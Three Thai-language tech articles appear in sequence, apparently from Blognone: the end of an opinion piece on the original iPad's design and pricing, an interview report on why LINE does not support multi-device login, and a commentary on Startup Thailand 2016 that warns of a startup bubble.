แม้ว่าคนอย่างพวกเราๆ กันเองจะรู้ดีกว่าจอ e-Ink มีข้อดีในเรื่องของพลังงานและราคา แต่ผู้ใช้ทั่วไปอาจไม่สนใจเรื่องนี้ ผมเคยดูรายการ Martha ที่มีการเอา Kindle มาโชว์ มาร์ธา (ซึ่งน่าจะแทนผู้ใช้ทั่วไปได้ดีกว่าพวกเรา) มีการพูดอย่างชัดเจนว่า “อยากได้จอสี” ซึ่งออกจะขัดจากความตั้งใจของ Amazon ที่อยากให้ Kindle ถูก เบา และใช้ได้นานๆ สักหน่อย แต่ผู้ใช้ทั่วไปไม่มีทางรู้หรือเข้าใจถึงเหตุผลเชิงเทคนิกเหล่านี้นอกจากราคา ซึ่ง iPad ก็ชดเชยราคาด้วยฟีเจอร์อีกมากมายได้เป็นอย่างดี อีกผู้เล่นหนึ่งที่น่าถูกเปรียบเทียบคือ Chrome OS แม้ว่าในตอนนี้จะยังไม่มีความชัดเจนในตัวฮาร์ดแวร์ที่จะออกมา แต่สิ่งที่เราคงยืนยันได้แน่ๆ คือ iPhone OS น่าจะทำทุกอย่างที่ Chrome OS ทำได้ แต่แน่นอนว่าตัว Chrome OS เองน่าจะมีอิสระของฮาร์ดแวร์ที่สูงกว่าที่อาจจะมาทั้งในรูปแบบ tablet หรือโน๊ตบุ๊กให้เลือกใช้ก็ว่ากันไป รวมถึงความต้องการทางฮาร์ดแวร์ที่น่าจะต่ำกว่า และส่งผลถึงราคาที่ถูกกว่าอย่างแน่นอน และเมื่อถึงจุดนั้นหากแอปเปิลคิดจะมาสู้ด้วยจริงๆ คงไม่ยากสำหรับแอปเปิลแล้วที่จะทำอุปกรณ์ที่มีแต่ Safari บน iPhone OS กับฮาร์ดแวร์พอประมาณราคาถูกมาสู้ด้วย ดังนั้น Chrome OS คงจะต้องหาจุดขายอื่นๆ (นอกเหนือจากอิสระของฮาร์ดแวร์) มาต่อสู้ให้ได้เช่นเดียวกันเมื่อถึงเวลานั้น อีกข้อกังขาหนึ่งที่ทุกคนสงสัย คือทำไมแอปเปิลถึงเลือกใช้จอขนาด 4:3 ยิ่งกับตัวเลข 1024 x 768 ที่มีกลิ่นไอของความโบราณซ่อนอยู่ เหตุผลหนึ่งที่เป็นไปได้คือ อุปกรณ์นี้จำเป็นต้องถือได้ด้วยมือเดียว (เพราะอีกมือต้องใช้สัมผัสเป็นหลัก) ในขณะที่ต้องสามารถปรับเปลี่ยนมุมมองได้ทั้งแนวนอนและแนวตั้ง การจับอุปกรณ์ลักษณะนี้ในแนวนอนที่มีอัตราส่วน 16:9 ด้วยมือซ้ายที่ขอบด้านซ้ายคงไม่ง่ายเท่าใดนักจนอาจจะต้องหาวิธีการจับแบบอื่นๆ ซึ่งเป็นรูปแบบที่แอปเปิลไม่ต้องการ หากเราสังเกตการออกแบบของ iPad จะพบว่ามีขอบรอบจอที่หนาผิดปกติ และเท่ากันรอบๆ ทุกด้าน ซึ่งแตกต่างจาก iPhone / iPod touch ที่จะมีเฉพาะด้านบนและล่างเพื่อเป็นพื้นที่สำหรับอุปกรณ์พวกพอร์ทต่างๆ จะเห็นได้ว่าแอปเปิลตั้งใจให้ผู้ใช้จับ iPad ในสภาพที่สามารถหมุนไปหมุนมาได้โดยง่าย โดยมือที่จับก็ยังไม่ไปสัมผัสจอจนทำให้โปรแกรมเข้าใจผิดไป นอกจากนี้เรายังสังเกตได้ว่า แอปเปิลพยายามที่จะนำเสนอ iPad ว่ารูปแบบพื้นฐานของมันคือแนวตั้ง ทั้งจากภาพประชาสัมพันธ์ต่างๆ การถือของสตีฟบนเวที การเสียบบน Dock ตำแหน่งของปุ่ม Home หรือแม้แต่หน้าจอ Home Screen ก็ตาม เพราะนั่นคือแนวทางที่เหมาะสมในการถือ iPad นี้ อาจจะเป็นไปได้ว่าแอปเปิลต้องใช้เวลาในการสร้างความเคยชินนี้ ก่อนที่จะออก iPad ที่กลายเป็น 16:9 หรือ 3:2 ต่อไป คุณสมบัติอื่นๆ ทางด้านฮาร์ดแวร์ก็ไม่มีอะไรที่คาดเดาไม่ได้หรือแตกต่างจากเจ้าอื่นถ้าจะทำเป็นพิเศษ มี Accelerometer, Ambient Light Sensor, Wi-Fi a/b/g/n, Bluetooth 2.1 EDR, Digital Compass นอกจากนี้หากเป็นรุ่นที่มี EDGE/3G ก็จะมี A-GPS เพิ่มขึ้นมา จุดที่น่าตื่นเต้นที่สุดอีกอย่างหนึ่งคือราคาของ iPad ที่เริ่มต้นเพียง $499 หากเราเทียบกับ JooJoo ที่มีราคาเท่ากัน iPad เหนือกว่าในแทบทุกแง่มุม ทั้งขนาด 16GB เทียบกับ 4GB, ความบาง 0.5 นิ้วเทียบกับ 0.7 นิ้ว น้ำหนัก 0.68 กิโลเทียบกับ 1.1 กิโล แบตเตอรี่ 10 ชั่วโมงเทียบกับ 5 ชั่วโมง ทิ้งไว้สิ่งที่เหนือกว่าของ JooJoo คือจอที่ใหญ่กว่า ละเอียดกว่า หากเราลองมาเปรียบเทียบ iPad 3G 16GB กับ iPhone 3GS 16GB องค์ประกอบที่ต่างกันหลักๆ ทางฮาร์ดแวร์มีเพียงกล้อง ขนาดเครื่อง ขนาดจอที่สุดท้ายแล้วน่าจะมีค่าใช้จ่ายที่สูงกว่า แต่ iPad กลับขายที่ $630 เทียบกับ iPhone 3GS ที่ราคาประเมินอยู่ที่ $700 จะเห็นได้ว่าแอปเปิลตั้งใจตั้งราคา iPad ไว้ในจุดที่ต่ำกว่าปกติมาก และน่าจะมีกำไรสุทธิจริงๆ ต่ำกว่ามาตรฐานทั่วไป คำถามคือ...ทำไม? ประเด็นแรกที่อาจเป็นไปได้ คือการที่แอปเปิลอาจคาดหวังการได้กำไรจาก iTunes Store, App Store และ iBookstore แต่ประเด็นนี้ก็อาจจะขัดกับประกาศผลประกอบการเมื่อไม่นานนี้ของแอปเปิลที่ระบุว่า กำไรจาก iTunes Store และ App Store น้อยมากหากเทียบกับรายได้จากการขายฮาร์ดแวร์ อีกประเด็นหนึ่ง คือการรีบแย่งพื้นที่นี้ไว้เพราะเป็นสมรภูมิที่หลายๆ คนกำลังจะเตรียมลงมาเล่น อุปกรณ์นี้ไม่ใช่ของที่จะมาแทนโทรศัพท์หรือคอมพิวเตอร์ แปลว่าผู้ใช้ต้องเจียดเงินเพิ่มเพื่อที่ว่างตรงนี้ จึงแน่นอนว่ามันต้องมีราคาถูกพอที่ผู้ใช้จะยอมจ่าย แม้ว่า $499 อาจจะยังแพงไปสำหรับหลายๆ คนในตอนนี้ แต่อย่างน้อยที่สุดก็คงสร้างฐานลูกค้าได้มากกว่า $999 ที่เคยลือกันไว้ และฐานลูกค้าเหล่านี้ก็จะมีประโยชน์กับตัวแอปเปิลเองในอนาคต เหมือนที่ iPod สามารถดึงให้ผู้ใช้หลายๆ คนมาใช้ Mac ได้ เป็นต้น คงไม่มีใครกังขาว่า iPad มีจุดเริ่มที่น่าสนใจมากมาย มีฟีเจอร์และแนวทางการใช้งานมากมายที่เราหลายๆ คนจินตนาการกันไว้ แต่ปัญหาเดียวและใหญ่ที่สุดที่จะชี้ชะตา iPad คือ พวกเราจะมีที่ว่างในชีวิตให้กับอุปกรณ์ประเภทที่สามนี้จริงๆ หรือ? เวลาเท่านั้นที่ตอบได้ครับ...
# ไขข้อข้องใจ ทำไม LINE ล็อกอินหลายเครื่องพร้อมกันไม่ได้ คำตอบจากวิศวกร LINE สำนักงานใหญ่ ประเด็นสำคัญที่ผู้ใช้ LINE คาใจกันมานานคือ "ทำไมไม่สามารถล็อกอินพร้อมกันในสมาร์ทโฟน 2 เครื่องได้" และ "ทำไมไม่เซฟรูปหรือแชททั้งหมดไว้ให้" ซึ่งที่ผ่านมาก็ไม่เคยมีคำตอบจริงๆ จังๆ จาก LINE ในเรื่องนี้เช่นกัน ผมมีโอกาสเข้าร่วมงาน LINE Developer Day 2019 และได้สัมภาษณ์วิศวกรของ LINE ประเทศญี่ปุ่นคือคุณ Shunsuke Nakamura และคุณ Masakuni Oishi ในเรื่องนี้พอดี และได้คำตอบมาฝากผู้ใช้ LINE ในไทยกันครับ (คำตอบสั้นๆ เป็นภาษาเทคนิคคือ technical debt) คุณ Shunsuke Nakamura มีหัวข้อที่พูดในงานสัมมนาเกี่ยวกับสถาปัตยกรรมของ LINE พอดี โดยใช้หัวข้อว่า **LINT (LINE Improvement for Next Ten years)** ประเด็นสำคัญคือ LINE เริ่มพัฒนาขึ้นในปี 2011 ในยุคที่ผู้ใช้ยังน้อย (เพียง 1 ล้านคน) ทุกอย่างยังเพิ่งเริ่มต้น สถาปัตยกรรมของ LINE จึงออกแบบมาสำหรับผู้ใช้ 1 คน 1 อุปกรณ์ (1 user 1 device 1 session) และงานฝั่งเซิร์ฟเวอร์รันอยู่บนคลัสเตอร์ของ LINE เองที่มีประมาณ 10 ตัวเท่านั้น ตลอดเวลา 8 ปีที่ผ่านมา LINE มีผู้ใช้เติบโตขึ้นสูงมาก (ประมาณ 200 ล้านคน) มีบริการจำนวนมากที่พัฒนาขึ้นบนสถาปัตยกรรมเดิมของ LINE เช่น เกม เพลง วิดีโอ ฯลฯ ในขณะเดียวกัน ก็มีอุปกรณ์ชนิดใหม่ๆ เกิดขึ้นมากมาย เช่น แท็บเล็ตหรือนาฬิกาอัจฉริยะ การที่จำนวนผู้ใช้เติบโตอย่างรวดเร็ว โฟกัสของทีมงาน LINE จึงต้องสนใจเรื่องเสถียรภาพ (reliability) เป็นหลัก เพราะเคยเจอปัญหาเรื่องเสถียรภาพช่วงราวปี 2013 ทำให้เกิดภาวะส่งข้อความไม่ไป/ไปไม่ถึงผู้รับ เมื่อโฟกัสหลักของทีมวิศวกรอยู่ที่เสถียรภาพ จึงไม่เคยมีโอกาสได้มาปรับปรุงตัวสถาปัตยกรรมที่ออกแบบไว้ตั้งแต่ราวปี 2011 เลย LINE จึงเกิดภาวะ [technical debt](https://en.wikipedia.org/wiki/Technical_debt) หรือการเป็น "หนี้" เชิงเทคนิค ที่สถาปัตยกรรมในอดีตมีปัญหาบางจุด แต่ตอนนั้นไม่ได้แก้ และตามหลอกหลอนมายังปัจจุบัน ทีมวิศวกรของ LINE บอกว่ารับทราบปัญหาเหล่านี้เป็นอย่างดี แต่ตลอดหลายปีที่ผ่านมาไม่เคยมีความพยายามตั้งใจแก้ปัญหานี้กันอย่างจริงจัง ทำให้ปี 2019 นี้ LINE จึงตั้งทีม LINT (Line Improvement for Next Ten years) มาทำหน้าที่นี้ เนื่องจากปัญหาทางสถาปัตยกรรมมีจำนวนมาก ทีม LINT จึงโฟกัสแก้ไขเฉพาะบางปัญหาก่อน ที่แก้ไปแล้วในปี 2019 มีด้วยกัน 4 อย่างคือ 1. เปลี่ยนระบบการส่งข้อความมายังไคลเอนต์ จากเดิมที่พัฒนาบน[สเปก SPDY](https://www.blognone.com/news/21948/%E0%B8%81%E0%B8%B9%E0%B9%80%E0%B8%81%E0%B8%B4%E0%B8%A5%E0%B9%83%E0%B8%8A%E0%B9%89%E0%B9%82%E0%B8%9E%E0%B8%A3%E0%B9%82%E0%B8%95%E0%B8%84%E0%B8%AD%E0%B8%A5-spdy-%E0%B9%81%E0%B8%97%E0%B8%99-http-%E0%B8%81%E0%B8%A7%E0%B9%88%E0%B8%B2-90-%E0%B9%81%E0%B8%A5%E0%B9%89%E0%B8%A7) ที่ไม่เป็นมาตรฐาน หาไลบรารียาก เปลี่ยนมาเป็น HTTP/2 แทน และเปลี่ยนจากการเปิดคอนเนคชั่นแบบ long polling มาเป็น push 2. เปลี่ยนระบบดึง (fetch) ข้อความสำหรับเครื่องที่ไม่ได้ล็อกอินนานๆ ที่เปิดมาแล้วต้องซิงก์ข้อความนานมาก มาใช้ระบบใหม่ที่ทำงานรวดเร็วและประหยัดการประมวลผล-สตอเรจฝั่งเซิร์ฟเวอร์มากขึ้น 3. ปรับเรื่องการออก token ยืนยันตัวตนใหม่ (ไม่ได้พูดในงาน) 4. ปรับการตั้งค่าสตอเรจทั้งไคลเอนต์/เซิร์ฟเวอร์ (ไม่ได้พูดในงาน) หมายเหตุ: รายละเอียดในสไลด์ของคุณ Nakamura มีเรื่องสถาปัตยกรรมทางเทคนิคแบบลงลึก (มากๆ) จึงไม่ขอเขียนถึงในที่นี้ แต่ผู้สนใจสามารถ[ดาวน์โหลดสไลด์](https://speakerdeck.com/line_devday2019/lint-line-improvement-for-next-ten-years) กันได้ ถึงแม้โครงการ LINT ของปี 2019 ไม่ได้แก้เรื่องการล็อกอินหลายเครื่องพร้อมกัน แต่ผมเห็นในแผนการของ LINT ในอนาคตมีระบุเรื่องนี้ไว้ชัดเจน (3 อันบนในภาพ) ผมจึงได้สอบถามทั้งคุณ Nakamura และ Oishi เพื่อขอขยายความในประเด็นนี้ คำตอบที่ได้เป็นเหมือนในสไลด์แรกคือ สถาปัตยกรรมของ LINE วางไว้ตอนแรก มองแค่ 1 user 1 device 1 session จึงไม่รองรับการล็อกอินหลายเครื่องพร้อมกัน ถ้าจะทำให้รองรับได้ (เช่น กรณีของ iPhone + iPad หรือกรณีของมือถือ+พีซี) ต้องใช้ท่าแฮ็กเป็นกรณีพิเศษ ต้องทำการ migrate ข้อมูลระหว่างฐานข้อมูลไปมา ซึ่งเปลืองทรัพยากรมาก ตรงนี้ LINE จึงเปิดให้ใช้หลายเครื่องเป็นกรณีๆ ไป และจำกัดเฉพาะอุปกรณ์เป็นชนิดเท่านั้น นี่จึงอธิบายได้ว่าทำไมเราไม่สามารถล็อกอินใน LINE บนสมาร์ทโฟนหลายเครื่องได้พร้อมกัน คุณ Oishi บอกว่าทีมงานตั้งใจรองรับการใช้งานหลายอุปกรณ์ให้ดีกว่านี้ เพราะคิดว่าโลกในปัจจุบัน พฤติกรรมของผู้ใช้เปลี่ยนไป ผู้ใช้มีหลายเครื่องหลายบัญชีกว่าเดิม และส่งข้อมูลเป็นปริมาณต่อคนเยอะขึ้น ทำให้ระบบเซิร์ฟเวอร์หลังบ้านของ LINE เองก็ต้องก้าวตามให้ทันด้วย ส่วนประเด็นเรื่องสตอเรจว่าทำไมไม่เก็บข้อมูลแชทหรือรูปภาพให้ตลอดไป คำตอบก็ตรงไปตรงมาว่าเป็นเรื่องของต้นทุนฝั่งเซิร์ฟเวอร์นั่นเอง (LINE ใช้ระบบคลาวด์ภายในของตัวเองชื่อ Verda ที่พัฒนาบน OpenStack แต่ก็มีส่วนที่เขียนเองอยู่เยอะ) ด้วยต้นทุนการเก็บข้อมูลที่สูงมาก ทำให้ LINE ไม่สามารถรองรับข้อมูลทั้งหมดได้ และต้องปล่อยให้ข้อมูลแชทที่เก่าเกินไปนั้นหมดอายุและถูกลบทิ้งไป กล่าวโดยสรุปคือ ปัญหาเหล่านี้เป็นเรื่องที่ LINE รับทราบดี แต่ต้องใช้เวลาอีกสักระยะในการแก้ไขผ่านโครงการ LINT และยังไม่สามารถระบุได้ว่าจะเห็นผลกันเมื่อไร ตอนจบการสัมภาษณ์ ผมจึงถือโอกาสเป็นตัวแทนผู้ใช้ LINE ในไทย จับมือให้กำลังใจกับวิศวกรทั้งสองท่านเพื่อให้แก้ปัญหาโดยเร็วครับ
# บทสรุป Startup Thailand ถึงยุคสตาร์ตอัพไทยโด่งดัง แต่พึงระวังไม่ให้เป็นฟองสบู่ สัปดาห์ที่ผ่านมาเรามีงาน Startup Thailand 2016 ซึ่งถือเป็นงานด้านสตาร์ตอัพงานใหญ่งานแรก ที่ภาครัฐไทยลงมาเป็นเจ้าภาพอย่างเต็มตัว ผลการจัดงานประสบความสำเร็จเป็นอย่างดีในแง่ผู้เข้าชม (ตัวเลขอย่างไม่เป็นทางการที่ผมทราบมาคือ "มากกว่า 3 หมื่นคน") และในแง่ความรับรู้ของคนทั่วไป ผมมีโอกาสไปเดินดูงานในวันสุดท้ายคือวันอาทิตย์ที่ 1 พฤษภาคม พบว่าคนเยอะมาก บางช่วงถึงกับเดินฝ่าเข้าไปไม่ได้เลย จากการเดินชมงานก็มีความเห็นและข้อสังเกตดังนี้ ## รูปแบบและบรรยากาศการจัดงาน งาน Startup Thailand มีทั้งการออกบูตและเวทีสัมมนาที่เชิญวิทยากรชื่อดังจากทั้งในและต่างประเทศ มาร่วมให้ความรู้เกี่ยวกับวงการสตาร์ตอัพ ซึ่ง Blognone มีบทความรายงานบรรยากาศและเนื้อหาของงานอยู่บ้าง ใครยังไม่ได้อ่านก็แนะนำครับ - [พาเดินงาน Startup Thailand 2016 ชมบูตสตาร์ทอัพที่น่าสนใจในงานวันแรก](https://www.blognone.com/node/80456) - ["สตาร์ทอัพไทย โตเมืองนอกดีกว่าโตในบ้าน?" สรุปเสวนาในงาน Startup Thailand 2016](https://www.blognone.com/node/80538) - [Corporate Venture Capital ธนาคารกับบริษัทสื่อสารมีมุมมองเช่นไร จากงาน Startup Thailand 2016](https://www.blognone.com/node/80540) เนื้อหาจากงานสัมมนา สามารถดูย้อนหลังได้จาก [YouTube ThailandStartUp](https://www.youtube.com/channel/UCy_85vQ6tUvYvNR_B2htuTw) ส่วนของการออกบูต มีทั้งบูตจากบริษัทใหญ่ๆ เช่น โอเปอเรเตอร์ทั้งสามราย ธนาคารหลายราย และบูตจากสตาร์ตอัพที่แยกเป็น 8 กลุ่มตามอุตสาหกรรม นอกจากนี้ยังมีบูตจากภาคการศึกษา และหน่วยงานด้านสตาร์ตอัพในต่างประเทศมาร่วมให้ข้อมูลหรือความรู้ด้วย (งานวันสุดท้าย บูตต่างประเทศก็เริ่มเก็บของกลับไปบ้างแล้ว) จุดที่น่าสนใจคือบูตหลักที่แนะนำข้อมูลเบื้องต้นว่าสตาร์ตอัพคืออะไร สำหรับคนที่ไม่เคยรู้จักคำนี้มาก่อนเลย และบูตของหน่วยงานภาครัฐบาล ที่รวมตัวกันมาให้คำปรึกษากับประชาชนภายใต้แบรนด์เดียวคือ "ภาครัฐไทย" ไม่ได้เป็นต่างคนต่างมาออกบูต มีโลโก้ของตัวเองแยกกันให้ดูเลอะๆ เทอะๆ แบบที่เราคุ้นเคย แต่กลับดูเป็นอันหนึ่งอันเดียวกันภายใต้ภาพลักษณ์ว่า "หน่วยงานภาครัฐยินดีสนับสนุนผู้ประกอบการ" ซึ่งถือเป็นอะไรที่น่าประทับใจมาก และอยากให้งานลักษณะเดียวกันนี้ในอนาคตเดินรอยตาม ส่วนข้อเสียของงานที่หลายคนอาจเห็นตรงกันคือ งานให้พื้นที่บูตกับภาคเอกชนรายใหญ่มากไปหน่อย (และบางบูตก็ดูเงียบเหงามาก) ส่งผลให้พื้นที่ของสตาร์ตอัพหรือผู้ประกอบการรายย่อย ที่ควรเป็น "พระเอก" ของงานน้อยไปสักนิด ยิ่งมาเจอกับจำนวนคนเข้างานที่เยอะเกินคาดไปมาก ส่งผลให้ล็อคของผู้ประกอบการรายย่อยคนแน่นมาก จนแทบเดินไม่ได้เลย (งานหน้าขอทางเดินกว้างกว่านี้หน่อยนะครับ เอาแบบคนยืนฟังหน้าบูตแล้วคนอื่นๆ ยังสามารถเดินต่อไปได้) หมดช่วงของการเล่าบรรยากาศงานและติชมการจัดงานแล้ว ผมมีประเด็นเชิงเนื้อหาที่เกี่ยวข้องกับงาน อยากเขียนถึง 2 ประเด็นใหญ่ๆ ดังนี้ ## ตกลงแล้ว นิยามของสตาร์ตอัพคืออะไร คำว่า "สตาร์ตอัพ" ในความหมายของคนทำงานด้านไอที ย่อมหมายถึง tech startup หรือบริษัทด้านไอทีหน้าใหม่ที่เราคุ้นเคยกันดี แต่ปัจจุบันเมื่อพรมแดนของไอทีขยายตัวออกไปมาก ขอบเขตของคำว่า tech startup ก็เริ่มพร่าเลือน แบ่งแยกได้ยากขึ้นมาก ภายใต้นโยบายเรื่องสตาร์ตอัพของรัฐบาลชุดนี้ (ที่มีนายสมคิด จาตุศรีพิทักษ์ รองนายกรัฐมนตรีเป็นผู้ผลักดัน) ให้คำนิยามของ "สตาร์ตอัพ" ไปไกลกว่า tech startup แต่ครอบคลุมไปถึง "ธุรกิจเกิดใหม่" ด้านอื่นๆ ด้วย ตัวอย่างที่ใกล้เคียงหน่อยก็คือสตาร์ตอัพที่ใช้เทคโนโลยีอื่นที่ไม่ใช่ไอที เช่น สตาร์ตอัพด้านการแพทย์ หรือสตาร์ตอัพด้านเครื่องจักรอุตสาหกรรม แต่ที่เป็นประเด็นขัดแย้งพอสมควรตั้งแต่ก่อนเริ่มงาน ก็คือ startup ยังครอบคลุมไปถึงธุรกิจ SME บางส่วนด้วย (ซึ่งขอบเขตว่าแค่ไหนก็ไม่มีใครให้คำตอบได้ชัดเจน) เราจึงเห็นหน่วยงานที่ทำผลิตภัณฑ์แนว OTOP เข้ามาแสดงผลงานด้วยเช่นกัน ซึ่งสร้างประเด็นไม่น้อยระหว่างทั้งสองกลุ่ม (tech startup vs อื่นๆ) ว่าตกลงแล้วงานนี้จัดเพื่อใครกันแน่ ในมุมมองของผมแล้ว กิจการแบบไหนจะเรียกว่าเป็นสตาร์ตอัพได้หรือไม่ ไม่ใช่เรื่องสำคัญอะไรสักนิดเลย ประเด็นในภาพใหญ่กว่านั้นคือ ขอแค่เป็น **ผู้ประกอบการ** (entrepreneur) ที่มี **นวัตกรรม** (innovation) และ **ความสร้างสรรค์** (creativity) ก็เพียงพอแล้ว สภาพของภาคธุรกิจไทยในตอนนี้คือ โมเดลธุรกิจแบบเดิมๆ ที่ทำกันมาหลายสิบปีเริ่มไม่เวิร์คแล้ว จากปัจจัยหลายประการ ทั้งในแง่ผู้บริโภคที่เปลี่ยนไป เทคโนโลยีที่เปลี่ยนไป และการแข่งขันจากประเทศอื่นๆ ในตลาดโลก ผมเชื่อว่าผู้ประกอบการรายใหญ่ๆ จำนวนไม่น้อยรู้สึกว่าตัวเองต้องเปลี่ยน แต่ไม่รู้ชัดว่าต้องเปลี่ยนอย่างไร (อาการประมาณว่า "รู้ว่าต้องทำอะไรสักอย่าง แต่ไม่รู้ว่าจะทำอะไร") ผู้ประกอบการรุ่นใหม่ ไม่ว่าจะเป็น startup, SME หรือแม้กระทั่ง SE (social enterprise) เป็นตัวแทนของคนรุ่นใหม่ที่มีองค์ความรู้แบบใหม่ มีไอเดียใหม่ เครื่องมือแบบใหม่ และกล้าลองทำธุรกิจแบบใหม่ จึงกลายเป็นตัวจุดประกายของสังคมไทยในภาพรวม ในงานเราจึงเห็นคนหลากหลายกลุ่มที่เข้ามาเดินชมงาน ไม่ว่าจะเป็นกลุ่มพ่อแม่ พาลูกมาเดินดูวิชาชีพในอนาคต, กลุ่มวัยรุ่นที่อยากเปิดหรืออยากทำสตาร์ตอัพ, กลุ่มผู้ประกอบการรุ่นเก่า (อายุจะเริ่มเยอะหน่อย) หรือแม้กระทั่งผู้บริหารองค์กรขนาดใหญ่ของไทย หรือนักลงทุนที่มาเดินดูงานกันอย่างเงียบๆ ผู้เข้าชมงานจำนวนไม่น้อยคงมาด้วยเหตุผลเดียวกัน คือรู้ว่าอนาคตต้องเปลี่ยนแปลง และได้ยินคำว่าสตาร์ตอัพมานาน ไหนเลยมีโอกาสที่ชาวสตาร์ตอัพมารวมตัวกัน ก็ขอมาเดินสังเกตการณ์สักหน่อย มาเดินดูว่า "พวกเอ็งกำลังทำอะไรกันอยู่วะ" ที่กล่าวมาทั้งหมดนี้ ประเด็นของผมก็คือใครจะเป็นสตาร์ตอัพหรือ SME คงไม่ใช่เรื่องสำคัญ แต่ความสนใจใคร่รู้ของผู้เข้าชมงาน เป็นภาพสะท้อนของสังคมไทยว่ากำลังขาดแคลนโมเดลใหม่ๆ ที่ทันสมัยและแข่งขันได้ในโลก แต่ก็เป็นสัญญาณที่ดีว่ามีคนที่เริ่มรู้สึกตัว และพยายามเข้ามาเรียนรู้หรือหาข้อมูลเรื่องนวัตกรรม/ความสร้างสรรค์ กันเยอะขนาดนี้ ## อย่าให้สตาร์ตอัพไทย กลายเป็นฟองสบู่ อย่างไรก็ตาม ความสนใจอันล้นหลามต่อวงการสตาร์ตอัพไทยในปี 2016 ก็มีข้อควรระวังในมุมกลับเช่นกัน เพราะอะไรที่บูมจนเกินไปมันย่อมกลายเป็นฟองสบู่ และถ้าฟองสบู่แตกเมื่อไร ก็ต้องมีคนบาดเจ็บล้มตาย (ซึ่งตอนที่ฟองสบู่ยังไม่แตก ทุกคนก็มั่นใจเต็มที่ว่าไม่ใช่เราหรอก) เราคงพอคาดเดากันได้ว่า กระแสสตาร์ตอัพที่กำลังไต่ขึ้นสูง จะนำมาซึ่งความละโมบต่อ "เม็ดเงินลงทุน" จากนักลงทุนทั้งหลาย ไม่ว่าจะเป็น VC ทั้งในและต่างประเทศ หรือนักลงทุนรายย่อย (angel investor) การสร้างบริษัทเพื่อเคลมมูลค่าจาก valuation จะดีดตัวขึ้นอย่างก้าวกระโดด และจะมีนักลงทุนจำนวนไม่น้อยที่พร้อมจะ "เสี่ยง" ลงทุนในฝันหวาน ผลตอบแทนแบบทวีคูณชนิดที่นักลงทุนรายอื่นต้องอิจฉา แต่สิ่งที่จะตามมาในขั้นถัดไปคือ เมื่อเวลาผ่านไปสักระยะหนึ่ง สตาร์ตอัพบางรายเริ่มมีปัญหา ชีวิตไม่ได้เป็นไปตามแผนที่คาดไว้ ความขัดแย้งจะเริ่มบังเกิด นักลงทุนอาจเริ่มไม่พอใจที่ผลตอบแทนไม่เป็นไปตามคาด และเมื่อช่วงเวลาฟองสบู่แตกเริ่มมาถึง ทุกคนก็จะ "เข็ด" กับมันและไม่อยากลงทุนในกิจการเหล่านี้เพิ่มอีกแล้ว (เพราะการแยกบริษัทที่ดีออกจากบริษัทที่ล้มเหลว เป็นเรื่องยากมากในตอนต้น) ผลกระทบในด้านกลับคือสตาร์ตอัพหน้าใหม่ๆ ในอนาคตจะหาเงินทุนได้ยากขึ้นอีกมาก แม้ว่าจะมีฝีมือหรือคุณสมบัติที่ดีก็ตาม เมืองไทยเราผ่านสภาวะฟองสบู่กันมาหลายรอบแล้ว ไม่ว่าจะเป็นวิกฤตการเงินปี 2540 หรือสภาวะฟองสบู่อสังหาริมทรัพย์ในรอบไม่กี่ปีที่ผ่านมา ส่วนในแวดวงไอทีเอง ช่วงปี 2000 ก็เคยเกิดสภาวะฟองสบู่ดอทคอมกันมาแล้วรอบหนึ่ง เว็บไซต์หลายแห่งที่ได้รับเงินลงทุนในช่วงนั้น ก็ล้มหายตายจากกันไปมาก ผมคิดว่าสัญญาณเตือนภัยที่ดีอันหนึ่งของวงการ tech startup คือมีคนอยากเป็นผู้ประกอบการ อยากเป็น CEO กันเยอะ แต่กลับหาคนทำงานด้านเทคนิคไม่ค่อยได้ คำพูดติดปากของผู้ประกอบการสาย tech startup ในตอนนี้คือ "หา dev ให้หน่อย" หรือไม่ก็ "มีโปรแกรมเมอร์เจ๋งๆ แนะนำให้รู้จักมั้ย" เรื่องนี้ผมเคยเขียนไปแล้วในบทความ [คำแนะนำ 5 ข้อ สำหรับนักศึกษาจบใหม่ที่อยากเปิดสตาร์ตอัพ](https://www.blognone.com/node/79990) ว่าคุณสมบัติข้อแรกของผู้ประกอบการที่อยากทำ tech startup คือต้องเขียนโปรแกรมเองให้ได้ก่อน มิฉะนั้นคงเหมือนกับการเปิดร้านกาแฟ โดยที่ชงกาแฟไม่เป็น อย่าลืมนะครับว่าสิ่งที่เราจะเปิดคือ **tech** startup สัญญาณเตือนภัยข้อที่สองคือเราเริ่มเห็นประโยคหรือการเคลมเรื่อง "ความรวย" กันมากขึ้น (ซึ่งก็ไม่น่าแปลกใจนักกับสังคมที่ชื่นชอบและให้คุณค่ากับ "รวยเร็ว" หรือ "ให้เงินทำงาน") แต่คนที่ติดตามวงการสตาร์ตอัพต่างประเทศมาสักระยะ คงทราบกันดีว่าการรวยเร็วไม่มีอยู่จริง เหตุผลที่บริษัทสตาร์ตอัพในต่างประเทศทำเงินได้มหาศาล เป็นเพราะสามารถสร้าง "คุณค่า" ให้กับผู้ใช้หรือลูกค้าได้มากต่างหาก สภาพความรวยเป็นสิ่งที่ตามมาทีหลังจากคุณค่าเหล่านี้ ไม่มีหนทางอื่นอีกยกเว้นการค้นหาและสร้างสรรค์คุณค่าที่ตลาดต้องการ แล้วทำงานหนักเพื่อรักษามันไว้ จากนั้นค่อยทำเงินจากมัน รอบ 2-3 เดือนที่ผ่านมา ก็มีผู้ใหญ่ในวงการไอทีไทยหลายท่าน สังเกตเห็นสัญญาณฟองสบู่ลักษณะนี้เกิดขึ้นในวงการ และออกมาเขียนบทความหรือโพสต์เตือนผ่านช่องทาง social ต่างๆ กันบ้างแล้ว (ใครค้นพบโพสต์ไหนน่าสนใจ ก็มาแชร์แบ่งปันกันได้ในคอมเมนต์) ผมคิดว่าคำเตือนเหล่านี้มีค่ามาก และเป็นสิ่งที่สตาร์ตอัพรุ่นปัจจุบันควรรับฟัง รวมถึงระลึกเอาไว้ตลอดเวลา
